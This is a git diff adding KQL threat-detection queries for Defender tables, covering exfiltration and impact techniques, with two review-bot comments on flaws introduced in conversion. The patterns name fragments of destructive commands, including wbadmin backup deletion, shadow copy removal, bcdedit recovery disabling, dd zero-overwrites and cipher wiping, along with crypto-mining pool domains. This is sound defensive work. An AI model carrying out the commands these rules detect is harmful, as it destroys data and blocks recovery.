+| where (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "-s WebClient" and InitiatingProcessFolderPath endswith "\\svchost.exe") and (not((ProcessCommandLine contains "://10." or ProcessCommandLine contains "://192.168." or ProcessCommandLine contains "://172.16." or ProcessCommandLine contains "://172.17." or ProcessCommandLine contains "://172.18." or ProcessCommandLine contains "://172.19." or ProcessCommandLine contains "://172.20." or ProcessCommandLine contains "://172.21." or ProcessCommandLine contains "://172.22." or ProcessCommandLine contains "://172.23." or ProcessCommandLine contains "://172.24." or ProcessCommandLine contains "://172.25." or ProcessCommandLine contains "://172.26." or ProcessCommandLine contains "://172.27." or ProcessCommandLine contains "://172.28." or ProcessCommandLine contains "://172.29." or ProcessCommandLine contains "://172.30." or ProcessCommandLine contains "://172.31." or ProcessCommandLine contains "://127." or ProcessCommandLine contains "://169.254.")))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/tap_installer_execution.kql b/KQL/rules/Exfiltration/tap_installer_execution.kql
new file mode 100644
index 00000000..f9e38623
--- /dev/null
+++ b/KQL/rules/Exfiltration/tap_installer_execution.kql
@@ -0,0 +1,12 @@
+// Title: Tap Installer Execution
+// Author: Daniil Yugoslavskiy, Ian Davis, oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048
+// False Positives:
+// - Legitimate OpenVPN TAP installation
+
+DeviceProcessEvents
+| where FolderPath endswith "\\tapinstall.exe" and (not(((FolderPath contains ":\\Program Files\\Avast Software\\SecureLine VPN\\" or FolderPath contains ":\\Program Files (x86)\\Avast Software\\SecureLine VPN\\") or FolderPath contains ":\\Program Files\\OpenVPN Connect\\drivers\\tap\\" or FolderPath contains ":\\Program Files (x86)\\Proton Technologies\\ProtonVPNTap\\installer\\")))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql
new file mode 100644
index 00000000..8651f814
--- /dev/null
+++ b/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql
@@ -0,0 +1,12 @@
+// Title: WebDav Client Execution Via Rundll32.EXE
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie".
+This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).
+
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048.003
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql b/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql
new file mode 100644
index 00000000..6675bce5
--- /dev/null
+++ b/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql
@@ -0,0 +1,13 @@
+// Title: All Backups Deleted Via Wbadmin.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-13
+// Level: high
+// Description: Detects the deletion of all backups or system state backups via "wbadmin.exe".
+This technique is used by numerous ransomware families and actors.
+This may only be successful on server platforms that have Windows Backup enabled.
+
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "keepVersions:0" and (ProcessCommandLine contains "delete" and ProcessCommandLine contains "backup")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Impact/backup_files_deleted.kql b/KQL/rules/Impact/backup_files_deleted.kql
new file mode 100644
index 00000000..93f9a0f6
--- /dev/null
+++ b/KQL/rules/Impact/backup_files_deleted.kql
@@ -0,0 +1,12 @@
+// Title: Backup Files Deleted
+// Author: frack113
+// Date: 2022-01-02
+// Level: medium
+// Description: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate usage
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wt.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (FolderPath endswith ".VHD" or FolderPath endswith ".bac" or FolderPath endswith ".bak" or FolderPath endswith ".wbcat" or FolderPath endswith ".bkf" or FolderPath endswith ".set" or FolderPath endswith ".win" or FolderPath endswith ".dsk")
\ No newline at end of file
diff --git a/KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql b/KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql
new file mode 100644
index 00000000..fdfe32b3
--- /dev/null
+++ b/KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql
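Review bot: The query in backup_files_deleted.kql filters DeviceFileEvents only by initiating process and file extension, so creations and modifications of `.bak`/`.set`/`.win` files by cmd.exe or PowerShell will alert as well, although the title and description are about deletion; the delete-event constraint of the source rule was lost in conversion. Add `| where ActionType == "FileDeleted"` ahead of the existing filter (confirm the exact ActionType value against the table schema). The generic `.set` and `.win` suffixes make the missing constraint more costly than it looks.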
@@ -0,0 +1,12 @@
+// Title: Boot Configuration Tampering Via Bcdedit.EXE
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "bootstatuspolicy" and ProcessCommandLine contains "ignoreallfailures") or (ProcessCommandLine contains "recoveryenabled" and ProcessCommandLine contains "no")) and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe") and ProcessCommandLine contains "set"
\ No newline at end of file
diff --git a/KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql b/KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql
new file mode 100644
index 00000000..5daf3a9e
--- /dev/null
+++ b/KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql
@@ -0,0 +1,12 @@
+// Title: Copy From VolumeShadowCopy Via Cmd.EXE
+// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+// Date: 2021-08-09
+// Level: high
+// Description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Backup scenarios using the commandline
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "copy " and ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy"
\ No newline at end of file
diff --git a/KQL/rules/Impact/dd_file_overwrite.kql b/KQL/rules/Impact/dd_file_overwrite.kql
new file mode 100644
index 00000000..35a093b5
--- /dev/null
+++ b/KQL/rules/Impact/dd_file_overwrite.kql
@@ -0,0 +1,12 @@
+// Title: DD File Overwrite
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-10-15
+// Level: low
+// Description: Detects potential overwriting and deletion of a file using DD.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1485
+// False Positives:
+// - Any user deleting files that way.
+
+DeviceProcessEvents
+| where (FolderPath in~ ("/bin/dd", "/usr/bin/dd")) and ProcessCommandLine contains "of=" and (ProcessCommandLine contains "if=/dev/zero" or ProcessCommandLine contains "if=/dev/null")
\ No newline at end of file
diff --git a/KQL/rules/Impact/delete_all_scheduled_tasks.kql b/KQL/rules/Impact/delete_all_scheduled_tasks.kql
new file mode 100644
index 00000000..8f4881b5
--- /dev/null
+++ b/KQL/rules/Impact/delete_all_scheduled_tasks.kql
@@ -0,0 +1,12 @@
+// Title: Delete All Scheduled Tasks
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /delete " and ProcessCommandLine contains "/tn *" and ProcessCommandLine contains " /f") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/KQL/rules/Impact/delete_important_scheduled_task.kql b/KQL/rules/Impact/delete_important_scheduled_task.kql
new file mode 100644
index 00000000..2cbc5c3f
--- /dev/null
+++ b/KQL/rules/Impact/delete_important_scheduled_task.kql
@@ -0,0 +1,12 @@
+// Title: Delete Important Scheduled Task
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "/tn") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql b/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql
new file mode 100644
index 00000000..294ac0d8
--- /dev/null
+++ b/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql
@@ -0,0 +1,13 @@
+// Title: Deleted Data Overwritten Via Cipher.EXE
+// Author: frack113
+// Date: 2021-12-26
+// Level: medium
+// Description: Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk.
+Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.
+Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives
+
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1485
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /w:" and (ProcessVersionInfoOriginalFileName =~ "CIPHER.EXE" or FolderPath endswith "\\cipher.exe")
\ No newline at end of file
diff --git a/KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql b/KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql
new file mode 100644
index 00000000..b32244be
--- /dev/null
+++ b/KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql
@@ -0,0 +1,10 @@
+// Title: Deletion of Volume Shadow Copies via WMI with PowerShell
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-20
+// Level: high
+// Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".Delete()" or ProcessCommandLine contains "Remove-WmiObject" or ProcessCommandLine contains "rwmi" or ProcessCommandLine contains "Remove-CimInstance" or ProcessCommandLine contains "rcim") and (ProcessCommandLine contains "Get-WmiObject" or ProcessCommandLine contains "gwmi" or ProcessCommandLine contains "Get-CimInstance" or ProcessCommandLine contains "gcim") and ProcessCommandLine contains "Win32_ShadowCopy"
\ No newline at end of file
diff --git a/KQL/rules/Impact/disable_important_scheduled_task.kql b/KQL/rules/Impact/disable_important_scheduled_task.kql
new file mode 100644
index 00000000..891eaadc
--- /dev/null
+++ b/KQL/rules/Impact/disable_important_scheduled_task.kql
@@ -0,0 +1,10 @@
+// Title: Disable Important Scheduled Task
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems), X__Junior
+// Date: 2021-12-26
+// Level: high
+// Description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/Change" and ProcessCommandLine contains "/TN" and ProcessCommandLine contains "/disable") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql
new file mode 100644
index 00000000..ce83ba59
--- /dev/null
+++ b/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql
@@ -0,0 +1,12 @@
+// Title: File Recovery From Backup Via Wbadmin.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2024-05-10
+// Level: medium
+// Description: Detects the recovery of files from backups via "wbadmin.exe".
+Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.
+
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql b/KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql
new file mode 100644
index 00000000..54aab863
--- /dev/null
+++ b/KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql
@@ -0,0 +1,12 @@
+// Title: Group Has Been Deleted Via Groupdel
+// Author: Tuan Le (NCSGroup)
+// Date: 2022-12-26
+// Level: medium
+// Description: Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1531
+// False Positives:
+// - Legitimate administrator activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/groupdel"
\ No newline at end of file
diff --git a/KQL/rules/Impact/history_file_deletion.kql b/KQL/rules/Impact/history_file_deletion.kql
new file mode 100644
index 00000000..30214a1d
--- /dev/null
+++ b/KQL/rules/Impact/history_file_deletion.kql
@@ -0,0 +1,12 @@
+// Title: History File Deletion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-20
+// Level: high
+// Description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1565.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (FolderPath endswith "/rm" or FolderPath endswith "/unlink" or FolderPath endswith "/shred") and ((ProcessCommandLine contains "/.bash_history" or ProcessCommandLine contains "/.zsh_history") or (ProcessCommandLine endswith "_history" or ProcessCommandLine endswith ".history" or ProcessCommandLine endswith "zhistory"))
\ No newline at end of file
diff --git a/KQL/rules/Impact/linux_crypto_mining_indicators.kql b/KQL/rules/Impact/linux_crypto_mining_indicators.kql
new file mode 100644
index 00000000..810b845f
--- /dev/null
+++ b/KQL/rules/Impact/linux_crypto_mining_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Linux Crypto Mining Indicators
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-10-26
+// Level: high
+// Description: Detects command line parameters or strings often used by crypto miners
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1496
+// False Positives:
+// - Legitimate use of crypto miners
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " --cpu-priority=" or ProcessCommandLine contains "--donate-level=0" or ProcessCommandLine contains " -o pool." or ProcessCommandLine contains " --nicehash" or ProcessCommandLine contains " --algo=rx/0 " or ProcessCommandLine contains "stratum+tcp://" or ProcessCommandLine contains "stratum+udp://" or ProcessCommandLine contains "sh -c /sbin/modprobe msr allow_writes=on" or ProcessCommandLine contains "LS1kb25hdGUtbGV2ZWw9" or ProcessCommandLine contains "0tZG9uYXRlLWxldmVsP" or ProcessCommandLine contains "tLWRvbmF0ZS1sZXZlbD" or ProcessCommandLine contains "c3RyYXR1bSt0Y3A6Ly" or ProcessCommandLine contains "N0cmF0dW0rdGNwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3RjcDovL" or ProcessCommandLine contains "c3RyYXR1bSt1ZHA6Ly" or ProcessCommandLine contains "N0cmF0dW0rdWRwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3VkcDovL"
\ No newline at end of file
diff --git a/KQL/rules/Impact/linux_crypto_mining_pool_connections.kql b/KQL/rules/Impact/linux_crypto_mining_pool_connections.kql
new file mode 100644
index 00000000..78adb04d
--- /dev/null
+++ b/KQL/rules/Impact/linux_crypto_mining_pool_connections.kql
@@ -0,0 +1,12 @@
+// Title: Linux Crypto Mining Pool Connections
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-10-26
+// Level: high
+// Description: Detects process connections to a Monero crypto mining pool
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1496
+// False Positives:
+// - Legitimate use of crypto miners
+
+DeviceNetworkEvents
+| where RemoteUrl in~ ("pool.minexmr.com", "fr.minexmr.com", "de.minexmr.com", "sg.minexmr.com", "ca.minexmr.com", "us-west.minexmr.com", "pool.supportxmr.com", "mine.c3pool.com", "xmr-eu1.nanopool.org", "xmr-eu2.nanopool.org", "xmr-us-east1.nanopool.org", "xmr-us-west1.nanopool.org", "xmr-asia1.nanopool.org", "xmr-jp1.nanopool.org", "xmr-au1.nanopool.org", "xmr.2miners.com", "xmr.hashcity.org", "xmr.f2pool.com", "xmrpool.eu", "pool.hashvault.pro", "moneroocean.stream", "monerocean.stream")
\ No newline at end of file
diff --git a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql
new file mode 100644
index 00000000..4fc05097
--- /dev/null
+++ b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql
@@ -0,0 +1,15 @@
+// Title: Load Of RstrtMgr.DLL By A Suspicious Process
+// Author: Luc Génaux
+// Date: 2023-11-28
+// Level: high
+// Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.
+This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
+It could also be used for anti-analysis purposes by shut downing specific processes.
+
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001
+// False Positives:
+// - Processes related to software installation
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql
new file mode 100644
index 00000000..cbe9deb4
--- /dev/null
+++ b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql
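Review bot: In the `| where` line, `InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll"` inspects the version resource of the process that performs the load, not of the loaded image, so that alternative can never be true for a DLL load and only the `FolderPath endswith "\\RstrtMgr.dll"` branch does any work. As far as I can tell DeviceImageLoadEvents exposes no version-info column for the loaded image, so the source rule's OriginalFileName selector has no direct equivalent here and the converter appears to have mapped it onto the initiating process. Either drop the branch or keep it with a comment such as `// NOTE: OriginalFileName of the loaded image is not available in DeviceImageLoadEvents; FolderPath match only`. The same mapping appears in load_of_rstrtmgr_dll_by_an_uncommon_process.kql.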
@@ -0,0 +1,16 @@
+// Title: Load Of RstrtMgr.DLL By An Uncommon Process
+// Author: Luc Génaux
+// Date: 2023-11-28
+// Level: low
+// Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.
+This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
+It could also be used for anti-analysis purposes by shut downing specific processes.
+
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001
+// False Positives:
+// - Other legitimate Windows processes not currently listed
+// - Processes related to software installation
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains ":\\$WINDOWS.~BT\\" or InitiatingProcessFolderPath contains ":\\$WinREAgent\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\ProgramData\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\SoftwareDistribution\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysNative\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" or InitiatingProcessFolderPath contains ":\\WUDownloadCache\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp"))))
\ No newline at end of file
diff --git a/KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql b/KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql
new file mode 100644
index 00000000..b0645f1b
--- /dev/null
+++ b/KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql
@@ -0,0 +1,12 @@
+// Title: Network Communication With Crypto Mining Pool
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-10-26
+// Level: high
+// Description: Detects initiated network connections to crypto mining pools
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1496
+// False Positives:
+// - Unlikely
+
+DeviceNetworkEvents
+| where RemoteUrl in~ ("alimabi.cn", "ap.luckpool.net", "bcn.pool.minergate.com", "bcn.vip.pool.minergate.com", "bohemianpool.com", "ca-aipg.miningocean.org", "ca-dynex.miningocean.org", "ca-neurai.miningocean.org", "ca-qrl.miningocean.org", "ca-upx.miningocean.org", "ca-zephyr.miningocean.org", "ca.minexmr.com", "ca.monero.herominers.com", "cbd.monerpool.org", "cbdv2.monerpool.org", "cryptmonero.com", "crypto-pool.fr", "crypto-pool.info", "cryptonight-hub.miningpoolhub.com", "d1pool.ddns.net", "d5pool.us", "daili01.monerpool.org", "de-aipg.miningocean.org", "de-dynex.miningocean.org", "de-zephyr.miningocean.org", "de.minexmr.com", "dl.nbminer.com", "donate.graef.in", "donate.ssl.xmrig.com", "donate.v2.xmrig.com", "donate.xmrig.com", "donate2.graef.in", "drill.moneroworld.com", "dwarfpool.com", "emercoin.com", "emercoin.net", "emergate.net", "ethereumpool.co", "eu.luckpool.net", "eu.minerpool.pw", "fcn-xmr.pool.minergate.com", "fee.xmrig.com", "fr-aipg.miningocean.org", "fr-dynex.miningocean.org", "fr-neurai.miningocean.org", "fr-qrl.miningocean.org", "fr-upx.miningocean.org", "fr-zephyr.miningocean.org", "fr.minexmr.com", "hellominer.com", "herominers.com", "hk-aipg.miningocean.org", "hk-dynex.miningocean.org", "hk-neurai.miningocean.org", "hk-qrl.miningocean.org", "hk-upx.miningocean.org", "hk-zephyr.miningocean.org", "huadong1-aeon.ppxxmr.com", "iwanttoearn.money", "jw-js1.ppxxmr.com", "koto-pool.work", "lhr.nbminer.com", "lhr3.nbminer.com", "linux.monerpool.org", "lokiturtle.herominers.com", "luckpool.net", "masari.miner.rocks", "mine.c3pool.com", "mine.moneropool.com", "mine.ppxxmr.com", "mine.zpool.ca", "mine1.ppxxmr.com", "minemonero.gq", "miner.ppxxmr.com", "miner.rocks", "minercircle.com", "minergate.com", "minerpool.pw", "minerrocks.com", "miners.pro", "minerxmr.ru", "minexmr.cn", "minexmr.com", "mining-help.ru", "miningpoolhub.com", "mixpools.org", "moner.monerpool.org", "moner1min.monerpool.org", "monero-master.crypto-pool.fr", "monero.crypto-pool.fr", "monero.hashvault.pro", "monero.herominers.com", "monero.lindon-pool.win", "monero.miners.pro", "monero.riefly.id", "monero.us.to", "monerocean.stream", "monerogb.com", "monerohash.com", "moneroocean.stream", "moneropool.com", "moneropool.nl", "monerorx.com", "monerpool.org", "moriaxmr.com", "mro.pool.minergate.com", "multipool.us", "myxmr.pw", "na.luckpool.net", "nanopool.org", "nbminer.com", "node3.luckpool.net", "noobxmr.com", "pangolinminer.comgandalph3000.com", "pool.4i7i.com", "pool.armornetwork.org", "pool.cortins.tk", "pool.gntl.co.uk", "pool.hashvault.pro", "pool.minergate.com", "pool.minexmr.com", "pool.monero.hashvault.pro", "pool.ppxxmr.com", "pool.somec.cc", "pool.support", "pool.supportxmr.com", "pool.usa-138.com", "pool.xmr.pt", "pool.xmrfast.com", "pool2.armornetwork.org", "poolchange.ppxxmr.com", "pooldd.com", "poolmining.org", "poolto.be", "ppxvip1.ppxxmr.com", "ppxxmr.com", "prohash.net", "r.twotouchauthentication.online", "randomx.xmrig.com", "ratchetmining.com", "seed.emercoin.com", "seed.emercoin.net", "seed.emergate.net", "seed1.joulecoin.org", "seed2.joulecoin.org", "seed3.joulecoin.org", "seed4.joulecoin.org", "seed5.joulecoin.org", "seed6.joulecoin.org", "seed7.joulecoin.org", "seed8.joulecoin.org", "sg-aipg.miningocean.org", "sg-dynex.miningocean.org", "sg-neurai.miningocean.org", "sg-qrl.miningocean.org", "sg-upx.miningocean.org", "sg-zephyr.miningocean.org", "sg.minexmr.com", "sheepman.mine.bz", "siamining.com", "sumokoin.minerrocks.com", "supportxmr.com", "suprnova.cc", "teracycle.net", "trtl.cnpool.cc", "trtl.pool.mine2gether.com", "turtle.miner.rocks", "us-aipg.miningocean.org", "us-dynex.miningocean.org", "us-neurai.miningocean.org", "us-west.minexmr.com", "us-zephyr.miningocean.org", "usxmrpool.com", "viaxmr.com", "webservicepag.webhop.net", "xiazai.monerpool.org", "xiazai1.monerpool.org", "xmc.pool.minergate.com", "xmo.pool.minergate.com", "xmr-asia1.nanopool.org", "xmr-au1.nanopool.org", "xmr-eu1.nanopool.org", "xmr-eu2.nanopool.org", "xmr-jp1.nanopool.org", "xmr-us-east1.nanopool.org", "xmr-us-west1.nanopool.org", "xmr-us.suprnova.cc", "xmr-usa.dwarfpool.com", "xmr.2miners.com", "xmr.5b6b7b.ru", "xmr.alimabi.cn", "xmr.bohemianpool.com", "xmr.crypto-pool.fr", "xmr.crypto-pool.info", "xmr.f2pool.com", "xmr.hashcity.org", "xmr.hex7e4.ru", "xmr.ip28.net", "xmr.monerpool.org", "xmr.mypool.online", "xmr.nanopool.org", "xmr.pool.gntl.co.uk", "xmr.pool.minergate.com", "xmr.poolto.be", "xmr.ppxxmr.com", "xmr.prohash.net", "xmr.simka.pw", "xmr.somec.cc", "xmr.suprnova.cc", "xmr.usa-138.com", "xmr.vip.pool.minergate.com", "xmr1min.monerpool.org", "xmrf.520fjh.org", "xmrf.fjhan.club", "xmrfast.com", "xmrigcc.graef.in", "xmrminer.cc", "xmrpool.de", "xmrpool.eu", "xmrpool.me", "xmrpool.net", "xmrpool.xyz", "xx11m.monerpool.org", "xx11mv2.monerpool.org", "xxx.hex7e4.ru", "zarabotaibitok.ru", "zer0day.ru")
\ No newline at end of file
